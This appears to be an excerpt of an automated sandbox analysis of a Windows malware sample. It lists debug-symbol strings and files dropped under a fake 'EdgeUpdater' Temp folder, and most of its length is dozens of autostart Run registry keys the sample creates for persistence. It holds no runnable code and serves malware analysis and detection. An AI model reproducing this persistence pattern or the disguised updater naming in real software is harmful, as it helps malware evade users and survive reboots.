Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.PDBem.Con0 source: UUSIService.exe, 00000010.00000002.2560152029.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: UUSIService.exe, 00000004.00000002.2275959842.0000000001096000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2345222337.00000000006AB000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2560152029.0000000000998000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdbRSDS source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: indows\mscorlib.pdb source: UUSIService.exe, 00000004.00000002.2275816156.0000000000D88000.00000004.00000010.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2345000662.00000000004F8000.00000004.00000010.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2850410204.00000000009C8000.00000004.00000010.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3153688028.0000000000D88000.00000004.00000010.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3226352952.00000000008F8000.00000004.00000010.00020000.00000000.sdmp
Source:	Binary string: \mscorlib.pdb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: rlib.pdb source: UUSIService.exe, 00000004.00000002.2275959842.00000000010CE000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2560152029.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2850600152.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3154542106.0000000001070000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D57000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3154542106.0000000001070000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.pdb source: UUSIService.exe, 00000004.00000002.2276579971.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2346068111.0000000002514000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2561765688.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000013.00000002.2640710341.0000000002681000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2851372225.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2938414169.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3155373385.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3227457110.0000000002811000.00000004.00000800.00020000.00000000.sdmp, WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb, source: UUSIService.exe, 00000013.00000002.2639309905.0000000000917000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: tem.pdb source: UUSIService.exe, 00000019.00000002.2933484966.00000000009C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.ni.pdb source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.PDB source: UUSIService.exe, 0000000B.00000002.2345222337.000000000066D000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2933484966.00000000009C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: SHA161934e089ib.pdbXH source: UUSIService.exe, 00000010.00000002.2560152029.00000000009D5000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdb00 source: WER56A8.tmp.dmp.27.dr
Source:	Binary string: mscorlib.pdb source: UUSIService.exe, 00000004.00000002.2276579971.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2346068111.0000000002514000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2561765688.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000013.00000002.2640710341.0000000002681000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2851372225.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2938414169.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3155373385.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3227457110.0000000002811000.00000004.00000800.00020000.00000000.sdmp, WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: \??\C:\Windows\dll\System.pdb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbNQ source: UUSIService.exe, 00000019.00000002.2933484966.0000000000A09000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.Core.pdb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.PDB03A source: UUSIService.exe, 0000001C.00000002.3154542106.000000000103D000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.pdbC source: UUSIService.exe, 00000019.00000002.2933484966.00000000009C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdb source: UUSIService.exe, 00000004.00000002.2275959842.00000000010CE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: mscorlib.ni.pdb source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: System.Core.pdb source: UUSIService.exe, 00000004.00000002.2276579971.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2346068111.0000000002514000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2561765688.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000013.00000002.2640710341.0000000002681000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2851372225.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2938414169.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3155373385.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3227457110.0000000002811000.00000004.00000800.00020000.00000000.sdmp, WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: rlib.pdbb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D57000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: orlib.pdb source: UUSIService.exe, 0000000B.00000002.2345222337.000000000066D000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2560152029.00000000009D5000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2850600152.0000000000D16000.00000004.00000020.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2933484966.00000000009C9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.Core.pdbk source: UUSIService.exe, 00000004.00000002.2276579971.0000000002DF3000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000000B.00000002.2346068111.0000000002514000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000010.00000002.2561765688.00000000027F1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000013.00000002.2640710341.0000000002681000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000016.00000002.2851372225.0000000002B11000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 00000019.00000002.2938414169.00000000025E1000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001C.00000002.3155373385.0000000002D3A000.00000004.00000800.00020000.00000000.sdmp, UUSIService.exe, 0000001F.00000002.3227457110.0000000002811000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: 00000000000000000400000000000000e.pdb source: UUSIService.exe, 00000016.00000002.2850600152.0000000000D16000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ni.pdb source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: System.Core.ni.pdbRSDS source: WERC536.tmp.dmp.18.dr, WERA90E.tmp.dmp.30.dr, WER371A.tmp.dmp.24.dr, WER56A8.tmp.dmp.27.dr, WER50A2.tmp.dmp.7.dr, WERC929.tmp.dmp.33.dr, WER7001.tmp.dmp.13.dr, WERE4C4.tmp.dmp.21.dr
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbDP source: UUSIService.exe, 00000019.00000002.2933484966.0000000000A09000.00000004.00000020.00020000.00000000.sdmp

Source: Yc9hcFC1ux.exe

Static PE information: 0xD516F2F1 [Thu Apr 15 21:43:13 2083 UTC]

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Code function: 2_2_0138054B pushfd ; ret	2_2_01386551
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Code function: 2_2_01386580 pushfd ; ret	2_2_01386561
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Code function: 2_2_013806BF push edi; retf	2_2_013806C2

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\EdgeUpdaters.exe			Jump to dropped file
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	File created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe			Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_173d4653192841669ecd7cc87f680d38	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_11efee7e6f2d4305b50f3d394b507378	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9c244486874b43958bb9ac03512c13ba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b1c4841ee0934c59a49b04282194c170	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3ccb5dd261db4421acca30be92e13afd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4a5dd3f9f2ef41e9b55e5ad8ac703bdc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_61bb4d0b2be347d5b8a4589622574dd5	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4bfdcc43c1e74612b08fc400554da949	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b9afe0f899fc49ceb4efa1c907b928f0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_5015919fc8b64ffcb911000b85d3f222	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e750c6ad326847c880eaba3a1747c998	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f217084fcb3e420d8ab7d8383677cd10	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_6f83459b1d784e89838c3e10347d07a4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_93e00ab5d94e49f082f737977b67609d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3311586bb493427981f86de57ccb1c11	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_38016393783049bd8526f5ddfbb34883	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_acb66be4be1d43bcbbff106598f468f3	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_991c2f388562482391a48b1bb0c27364	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_7ee3d080f318494ea61ce74eeb2859e0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f5ce90850cf9420bb0bf90f6547bae0e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_402bc198741c4e559b63235ebec92217	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4690d17558d3493bb2aecefc7aeacbcf	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_195cd6b4a5e44f70afd8e511704aaeb8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_54d21a8b7b4f4089a6ad6b70a45ffe88	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_87b89c9c4f284f3aa28892d3f911baa2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4e30c082a75c498799dff88517e25632	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_0421181aa6f7498db5b51d4af4e1810d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_02feff8cfbaa40e0aef8280c92f7f84e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c587999a94c44422aa779974152e2def	Jump to behavior
Source: C:\Users\user\Desktop\Yc9hcFC1ux.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b77d1557f2cc432ca516c465fca16d3a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_de0869ec33e04601a66b5de21060d19d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_0511349c3dbb4691833ff1355d37fe6b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_077886915c6e4c72a65cfa5b73ecf2c0	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4023c310e5854e5e88a368e2193bdffe	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_30c4687bc13a4d0bb6a18ff4b4d12138	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_93d994940f2749348896133d45cd531a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_0a9499943e5149458caed32d869b39e4	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_87d4551a42c944c585e38794edbfe4dd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_4e9cecf989ad439a9ec2c42b342d62ce	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_997f47db1fea4ac18f161ce7c16044a9	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_a64a465fcb5949bcb0685254854c3423	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9e4c8211b4d14fcda4888b1060900ab7	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_ef3b70dec06a4649a13f2318456eb822	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_0c617bf0702d4a4fae93ce41d0fc6bf8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_a26efce772854d8e96b277aae614135e	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_ce042f1d3dde41758a245f580a67982f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9e6ccac355c141e09096d40a1fbbeb18	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_e9730b3fe9574125a38d93d7d9a6f87a	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_2b5472aceaf64e5983be1b3b2b72289f	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_955fea78b7ac40eb9e0fc1887c107a2c	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_3530c8ce839e462cae161e3269611ddc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_bf643a6964ab42409d6c9eeba54386f8	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_8f5da03a9f7e479d852cef310f35c89d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f3cb7c72ddcf45a4bf535aa7a856966b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_825c64211e994beb8abc8f993be2c112	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_8430e0f39de04c7e92809b55ce5194ef	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_d6381e6f238e4dc6828209e35c6bfdba	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_64d204b5c5e14fd8b0be2636671abc33	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_9fe261ed906c4d4abc7a19d0c2c4c1f2	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_f7d890f2d5414f3ea627f94d77266fbd	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_59bfca1f0b394f9c854b5b1a311f908d	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_b1123db6f8864957b4b3c8d312b6bfaa	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_055ec554acf04ab1a841bdc5e4cad617	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_7cf7889a077643359b7c592223c68d2b	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_d5d003e9460c457599c41af0e18b8a20	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_c00aa859ce44440b846cbe8bee602ceb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_5d165eda359744a99df25c8ac2974c25	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_29997160726d47ceb6c125155e620958	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\UUSIService.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run UUSIService_52bfd30b05cc417ca023ff63c3301cfe	Jump to behavior
